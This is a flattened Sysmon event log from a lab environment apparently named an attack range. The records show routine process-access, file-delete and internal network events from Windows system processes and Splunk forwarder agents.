11:11:49.274{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1675-6216-F004-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.274{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1675-6216-F004-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:49.275{4F8D34B0-1675-6216-F004-000000003902}2068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:49.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8AD0E12D16BBEC3BA2C121AD34282FF6,SHA256=59215C3DFEA7E71E9E1DB74CEB01DE2D1CFB1F64D79FC0BE164DB6F8BDDBC04C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:49.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=633ACF9862AE890DCD552F27DA324D2E,SHA256=88EFD97B2C35F89FC38F19B0BD512F0B1409D186B0D6F0E0233BE440E45EE17C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:50.778{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32D18FC7BCE23CCAF165F9376FEE075F,SHA256=223D015CA6E1C9451146AA0466B04C5E157FFD89A3A164847359FA0BD89FE10D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:48.552{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51589-false10.0.1.12-8000- 23542300x8000000000000000220563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:50.665{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA06D3A8E40E38C1AF65716F4FC0FA0F,SHA256=181FEB194C445FFF34CA9F5944F91F32F73102031C899B8CEA885CBF3BDFCADD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:50.305{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACBA91D934B9053BC9B7A04D746CE520,SHA256=233396947B56A44843C5AA76367172A6FD57DE2D456412FA0434904850B05B96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:50.165{4F8D34B0-1675-6216-F104-000000003902}36361080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000296524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:49.514{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49354-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:51.843{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BF77B4C60D7C3F17DA340B95E5D1AB8,SHA256=5761139D191EF326D2042DAA5AABBF85D79D7B15CD8E573C55C61B2636A5177D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.727{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71979E988119AD1AD12A7485613C1C35,SHA256=09F812F5CB0B60EB566E9C74393461A1F48B9AAA19D88E1909C1AB7D07521ACA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1677-6216-F204-000000003902}2868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 